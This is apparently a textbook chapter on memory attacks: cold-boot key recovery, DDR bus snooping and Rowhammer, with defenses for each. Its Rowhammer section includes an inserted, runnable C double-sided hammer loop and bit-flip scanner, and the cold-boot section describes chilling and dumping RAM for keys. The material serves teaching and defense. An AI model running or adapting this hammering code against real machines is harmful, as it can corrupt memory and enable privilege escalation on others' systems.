
9. Memory Attacks: Cold Boot, Bus Snoop, and Rowhammer

9.1 Cold-boot attacks: data after power-off

In 2008 Halderman et al. (Princeton) showed that DRAM does not lose its contents the instant power is removed. Retention ranges from seconds at room temperature to minutes when the chips are chilled with an upside-down can of compressed air (the propellant cools the DRAM to roughly -50 °C), and much longer in liquid nitrogen. An attacker who seizes a running laptop can power-cycle it into a small memory-dumping kernel, or pull the DIMMs and read them in another machine, and recover disk-encryption keys from RAM before the bits decay. Because an AES key schedule is highly redundant, the key can be reconstructed even after a fraction of its bits have decayed. The defenses are full-memory encryption at the memory controller (AMD SME, Intel TME), keeping the key in hardware that never exposes it to DRAM (a TPM, or a secure coprocessor such as Apple's T2 Secure Enclave), keeping the key in CPU registers only (TRESOR), and firmware that scrubs RAM on reset (the TCG Platform Reset Attack Mitigation). Note that a TPM-sealed key helps only until the OS unseals it into DRAM for use: what matters is that the key never sits in plaintext RAM.

9.2 DDR bus snooping

DDR4 signals at 2.1 to 3.2 GT/s across a wide parallel bus and is far harder to tap than a serial link, but it is not out of reach: DIMM interposers built for protocol analyzers, and FPGA-based capture rigs demonstrated in academic work, can record traffic between the CPU and DRAM. The defense is transparent encryption at the memory controller (AMD SME/SEV-SNP, Intel TME/TME-MK), which turns the bus contents into ciphertext that looks pseudorandom to a sniffer. Encryption alone gives confidentiality; an attacker who can also drive the bus can still replay or relocate captured ciphertext blocks, and stopping that needs integrity and anti-replay protection over the encrypted region as well, as in Intel SGX's memory encryption engine.

9.3 Rowhammer

DRAM cells store charge that leaks over time, so every row must be refreshed periodically (every 64 ms in DDR3/DDR4). As cells shrink (sub-30 nm DDR3, sub-20 nm DDR4), neighbouring rows couple electrically, and activating one row over and over within a single refresh window disturbs the cells in physically adjacent rows enough to flip their bits. Kim et al. (ISCA 2014) characterized the effect on commodity DDR3 and showed it was reliably reproducible from software with a simple read-then-flush loop. Drammer (2016) weaponized it on Android: unprivileged code massaged the physical memory layout until a page table landed in a vulnerable page, then hammered the neighbours until a bit flipped in a page-table entry, giving the process write access to its own page tables and hence root. Throwhammer (2018) triggered flips over RDMA from the network, with no attacker code running on the victim. Half-Double (2021, Google) showed that on newer, denser parts hammering also flips bits two rows away, defeating TRR implementations that only refresh immediate neighbours. Blacksmith (2022) searched non-uniform, frequency-based hammering patterns and found flips on every one of the 40 DDR4 DIMMs it tested, despite their in-DRAM TRR.
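The read-then-flush loop at the core of these attacks, as an added example (not code from the original article or from any of the papers named above): a double-sided hammer over two aggressor addresses, with `clflush` (or `dc civac` on AArch64) after each load so every access becomes a DRAM row activation, followed by a scanner that compares the victim page against its fill pattern. Real attacks choose aggressors that are physically adjacent to the victim row, using /proc/self/pagemap or huge pages plus a reverse-engineered DRAM address map; this demo hammers virtually adjacent pages, so on an ECC or TRR-protected machine, or where the pages are not co-located in DRAM, it is expected to report zero flips. The page-size constant, fill patterns and iteration count are the example's own choices.

```c
/* Added example: minimal double-sided Rowhammer probe plus bit-flip scanner. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE 4096u
#define FILL 0xFFu                /* victim pattern; aggressors get the opposite */

static volatile uint64_t sink;    /* keeps the hammer loads from being optimized away */

/* Evict one cache line so the next load is served by DRAM (a row activation). */
static inline void flush_line(const volatile void *p) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" :: "r"(p) : "memory");
#elif defined(__aarch64__)
    __asm__ volatile("dc civac, %0" :: "r"(p) : "memory");
#else
    (void)p;                      /* no user-space flush on this arch: loads stay cached */
#endif
}

/* Double-sided hammer: load both aggressors, flush both, repeat.
 * Returns the number of activations issued (two per iteration). */
static uint64_t hammer(volatile uint8_t *agg1, volatile uint8_t *agg2, uint64_t iters) {
    uint64_t acc = 0;
    for (uint64_t i = 0; i < iters; i++) {
        acc += *agg1 + *agg2;
        flush_line(agg1);
        flush_line(agg2);
    }
    sink = acc;
    return 2 * iters;
}

/* Compare a victim region to its fill pattern. Returns the number of flipped
 * bits; if first_off is non-NULL, records the first flipped byte and its mask. */
static size_t count_flips(const uint8_t *victim, size_t len, uint8_t fill,
                          size_t *first_off, uint8_t *first_mask) {
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = victim[i] ^ fill;
        if (!diff) continue;
        if (flips == 0 && first_off) { *first_off = i; if (first_mask) *first_mask = diff; }
        flips += (size_t)__builtin_popcount(diff);
    }
    return flips;
}

/* Three page-aligned pages: aggressor / victim / aggressor. */
static uint8_t pages[3 * PAGE] __attribute__((aligned(4096)));

/* Fill, hammer, rescan. Returns the flip count (0 on a healthy or protected system). */
static size_t probe(uint64_t iters) {
    uint8_t *agg1 = pages, *victim = pages + PAGE, *agg2 = pages + 2 * PAGE;
    memset(agg1, 0x00, PAGE);
    memset(agg2, 0x00, PAGE);
    memset(victim, FILL, PAGE);
    for (size_t i = 0; i < PAGE; i += 64) flush_line(victim + i);   /* push fill to DRAM */
    uint64_t acts = hammer(agg1, agg2, iters);
    for (size_t i = 0; i < PAGE; i += 64) flush_line(victim + i);   /* read back from DRAM */
    size_t off = 0; uint8_t mask = 0;
    size_t flips = count_flips(victim, PAGE, FILL, &off, &mask);
    printf("%llu activations, %zu flipped bit(s)", (unsigned long long)acts, flips);
    if (flips) printf(", first at victim+%zu mask 0x%02x", off, mask);
    printf("\n");
    return flips;
}

/* Constructed sample for the scanner: a 32-byte victim slice in which bit 3 of
 * byte 5 and bits 0 and 7 of byte 20 have flipped (three flips in total). */
static const uint8_t SAMPLE_VICTIM[32] = {
    0xff,0xff,0xff,0xff,0xff,0xf7,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
    0xff,0xff,0xff,0xff,0x7e,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff };

int main(void) {
    size_t off = 0; uint8_t mask = 0;
    size_t n = count_flips(SAMPLE_VICTIM, sizeof SAMPLE_VICTIM, FILL, &off, &mask);
    printf("scanner self-check: %zu flips, first at byte %zu mask 0x%02x\n", n, off, mask);
    probe(2000000);               /* a few hundred milliseconds of hammering */
    return 0;
}
```

Build with `cc -O2 rowhammer.c -o rowhammer`. A production hammer additionally checks that the two aggressors map to the same bank and different rows, hammers for at least one full refresh interval, and repeats over many page triples, since a vulnerable bit has to be both physically adjacent to an aggressor and weak enough to flip.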

Mitigations:

  • TRR (Target Row Refresh). The DRAM (or, in the pTRR variant, the memory controller) counts activations and refreshes the neighbours of rows that cross a threshold. The trackers hold few counters and cover only near neighbours, which is exactly what TRRespass (2020), Half-Double and Blacksmith exploit. Defeated repeatedly.
  • ECC memory. SECDED codes correct a single-bit error and detect a double-bit error per word. Helps, but ECCploit (2019) showed that carefully placed multi-bit flips within one ECC word can escape detection, and a detected-but-uncorrectable error still takes the machine down.
  • Refresh-rate increase. Refreshing every 32 ms instead of 64 ms halves the activations an attacker can fit into one window. Costs energy and bandwidth, and Kim et al. found that doubling the rate reduces flips without eliminating them.
  • DDR5 RFM (Refresh Management). A standardized channel in which the DRAM counts activations per bank and the controller issues refresh-management commands when a threshold is crossed, alongside DDR5's on-die ECC. Helps, not perfect.

Rowhammer is the canonical example of physics escaping the abstraction. The DRAM specification said cells were independent. The shrinking process gave them coupling. The coupling was an attack channel. The defense is a continuous arms race between attackers finding patterns and DRAM vendors closing them.